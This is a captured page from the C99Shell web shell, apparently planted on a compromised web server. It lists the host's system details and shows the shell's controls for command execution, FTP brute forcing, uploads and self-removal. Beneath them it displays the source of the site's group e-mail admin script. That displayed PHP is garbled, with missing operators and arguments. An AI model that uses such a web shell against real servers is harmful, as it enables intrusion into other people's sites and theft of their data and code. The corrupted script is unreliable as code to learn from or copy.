!C99Shell v. 1.0 pre-release build #13!

Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a 

uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 

uid=99(nobody) gid=98(nobody) groups=98(nobody) 

Safe-mode: OFF (not secure)

/home/makras/public_html/admin/   drwxr-xr-x
Free 318.37 GB of 458.09 GB (69.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     send_email.php (2.29 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include("../include/settings");
include(
"../include/db_connect");

$log_query "SELECT * FROM email_log ORDER BY sent desc";
$log_data mysql_query($log_query$db);

?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
    <title>Send e-mail to group</title>
    <link rel="stylesheet" type="text/css" href="style.css">
</head>

<body>
<br>
<center>
<span class="title">Send e-mail to group<span><br><br>
</center>
<form action="sendmail.php" method="post" enctype="multipart/form-data">
<table border="2" bordercolor="#222244" cellpadding="0" cellspacing="0" align="center"><tr><td>
<table align="center" border="0"cellpadding="0" cellspacing="8">
    <tr>
        <td colspan="2"><br>&nbsp;</td>
    </tr>
     <tr>
         <td>Select HTML file with content:&nbsp;</td>
        <td><input type="file" name="mail_file" size="40"></td>
     </tr>
    <tr>
        <td>Give this e-mail a <b>Subject</b> header:&nbsp;</td>
        <td><input type="text" name="subject"></td>
    </tr>
    <tr>
        <td>Send this to group:</td>
        <td><select name="list">
            <option value="all">All</option>
            <option value="none">Just me</option>
            <option value="option_1">option 1</option>
            <option value="option_2">option 2</option>
            <option value="option_3">option 3</option>
            <option value="option_4">option 4</option>
            <option value="option_5">option 5</option>
        </select>
        </td>
    </tr>
     <tr>
        <td colspan="2" align="center"><br><input type="submit" value="Send this e-mail"><br>&nbsp;</td>
    </tr>
</table>
</td></tr></table>

<br>
<div align="center">
<a href="index.php">Back to Admin. index</a>
</div>
<br>
<table bgcolor="#ffffff" border="0" align="center" cellpadding="8" cellspacing="0" width="80%">
    <tr>
        <td colspan="3" align="center"><b>E-mail Log:</b></td>
    </tr>
    <tr>
        <td colspan="3" align="center"><hr width="90%" size="1" noshade></td>
    </tr>
    <tr>
        <td><u>Subject</u></td>
        <td><u>Sent</u></td>
        <td><u>Group</u></td>
    </tr>
    <?
    
while ($log mysql_fetch_array($log_data)){
        
$day substr($log[sent], 62);
        
$mon substr($log[sent], 42);
        
$yr substr($log[sent], 04);
        
$date date("F d, Y"mktime(0,0,0,$mon$day$yr));
        print(
"\t<tr>\n");
            print(
"\t\t<td><b>$log[subject]</b></td>\n");
            print(
"\t\t<td>$date</td>\n");
            print(
"\t\t<td>$log[list]</td>\n");
        print(
"\t</tr>\n");
    
    }
    
    
?>
    
</table>
 </form>
 </body>
 </html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.014 ]--